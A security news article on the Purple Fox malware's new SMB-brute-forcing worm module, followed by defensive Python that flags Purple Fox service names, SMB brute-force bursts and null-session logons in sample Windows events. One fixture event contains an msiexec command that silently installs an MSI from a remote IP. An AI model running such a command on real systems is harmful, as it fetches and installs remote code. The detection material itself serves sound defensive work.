Purple Fox, a malware strain that was earlier spread through exploit kits and malicious emails, has recently added a worm module
Purple Fox, a malware strain that was earlier spread through exploit kits and malicious emails, has recently added a worm module. This lets it scan for and infect Windows systems that are reachable over the Internet. Purple Fox has rootkit and backdoor capabilities and was first detected in 2018, by which point it had already infected around 30,000 devices.
It was then used as a downloader to deploy other malware strains. Guardicore Labs security researchers Amit Serper and Ophir Harpaz report that Purple Fox attacks have increased sharply since May 2020, reaching a total of 90,000 attacks and a 600% rise in infections.
Image: Guardicore Labs
Based on telemetry gathered through the Guardicore Global Sensors Network (GGSN), the malware's active port scanning and exploitation attempts began at the end of 2020. Once its Internet-wide scanning finds a reachable Windows system, Purple Fox's newly added worm module uses SMB password brute forcing to infect it.
Image: Purple Fox attack flow (Guardicore Labs)
According to the Guardicore Labs report, Purple Fox deploys its malware droppers and additional modules from an extensive network of bots: over 2,000 compromised servers. Once the malware runs at system startup, each infected system exhibits the same worm-like behavior, scanning continuously for new targets.
"Throughout our research, we have observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns," Serper and Harpaz stated.
"As the machine responds to the SMB probe that's being sent on port 445, it will try to authenticate to SMB by brute-forcing usernames and passwords or by trying to establish a null session," Guardicore Labs said. "If the authentication is successful, the malware will create a service whose name matches the regex AC0[0-9]{1} — e.g. AC01, AC02, AC05 (as mentioned before) that will download the MSI installation package from one of the many HTTP servers and thus will complete the infection loop."
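The infection loop quoted above (SMB brute force or null session on port 445, then a service named AC0[0-9] that fetches the MSI package) maps directly onto a few Windows event log checks. The following is an added example, not code from the article or from Guardicore's report: it runs simple detection logic over constructed sample events modelled on Windows Event IDs 7045 (service installed), 4625 (failed logon) and 4624 (successful logon). The field names, IP addresses, timestamps and the msiexec command line in the sample data are assumptions made for the example; the only detail taken from the report is the service-name regex.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Service-name pattern quoted from the Guardicore report: AC01, AC02, AC05, ...
SERVICE_NAME_RE = re.compile(r"^AC0[0-9]$")


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


# Constructed sample events (illustrative, not real telemetry). The dict keys
# are assumed names for fields one would pull out of Windows event logs.
SAMPLE_EVENTS = [
    # System log, Event ID 7045: a service was installed
    {"id": 7045, "ts": "2021-03-23T10:01:05", "host": "WS01", "service": "AC05",
     "image": "msiexec.exe /i http://203.0.113.10/update.msi /Q"},  # assumed command line
    {"id": 7045, "ts": "2021-03-23T10:02:40", "host": "WS01", "service": "AC12",
     "image": "C:\\tools\\agent.exe"},  # does NOT match AC0[0-9]
    {"id": 7045, "ts": "2021-03-23T10:03:11", "host": "WS02", "service": "Spooler",
     "image": "C:\\Windows\\System32\\spoolsv.exe"},
    # Security log, Event ID 4625: failed logon; logon type 3 = network (SMB)
    *[{"id": 4625, "ts": f"2021-03-23T10:00:{i:02d}", "host": "WS02", "logon_type": 3,
       "user": u, "src": "203.0.113.55"}
      for i, u in enumerate(["Administrator", "admin", "guest", "test", "user", "root",
                             "backup", "sql", "scan", "Administrator", "admin", "guest"])],
    {"id": 4625, "ts": "2021-03-23T10:05:00", "host": "WS02", "logon_type": 3,
     "user": "alice", "src": "10.0.0.8"},  # a single typo, not a brute force
    {"id": 4625, "ts": "2021-03-23T10:05:30", "host": "WS02", "logon_type": 2,
     "user": "bob", "src": "-"},  # interactive logon, ignored
    # Security log, Event ID 4624: successful network logon as ANONYMOUS LOGON (null session)
    {"id": 4624, "ts": "2021-03-23T10:00:30", "host": "WS02", "logon_type": 3,
     "user": "ANONYMOUS LOGON", "src": "203.0.113.55"},
]


def suspicious_services(events):
    """(host, service, image) for every 7045 event whose name matches AC0[0-9]."""
    return [(e["host"], e["service"], e["image"])
            for e in events
            if e["id"] == 7045 and SERVICE_NAME_RE.match(e["service"])]


def smb_bruteforce_sources(events, threshold=10, window=timedelta(seconds=60)):
    """Source IPs with >= threshold failed network logons inside any sliding window.

    Returns {src_ip: total_failures}. Only logon type 3 (network) is counted,
    which is what an SMB authentication attempt on 445 produces.
    """
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e.get("logon_type") == 3 and e.get("src") not in (None, "-"):
            by_src[e["src"]].append(parse_ts(e["ts"]))
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # shrink window from the left
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged[src] = len(times)
                break
    return flagged


def null_session_logons(events):
    """(host, src) for successful network logons as ANONYMOUS LOGON, i.e. SMB null sessions."""
    return [(e["host"], e["src"]) for e in events
            if e["id"] == 4624 and e.get("logon_type") == 3
            and e.get("user") == "ANONYMOUS LOGON"]


if __name__ == "__main__":
    print("services:", suspicious_services(SAMPLE_EVENTS))
    print("brute force:", smb_bruteforce_sources(SAMPLE_EVENTS))
    print("null sessions:", null_session_logons(SAMPLE_EVENTS))
```

The service-name check is the highest-signal of the three and is cheap to run across a fleet; the threshold for the brute-force check should be tuned to the environment, and ANONYMOUS LOGON events are noisy on many networks, so treat that third check as corroborating evidence rather than an alert on its own. Correlating all three from the same source IP within a few minutes, as in the sample data, is what the report's attack flow would look like in the logs.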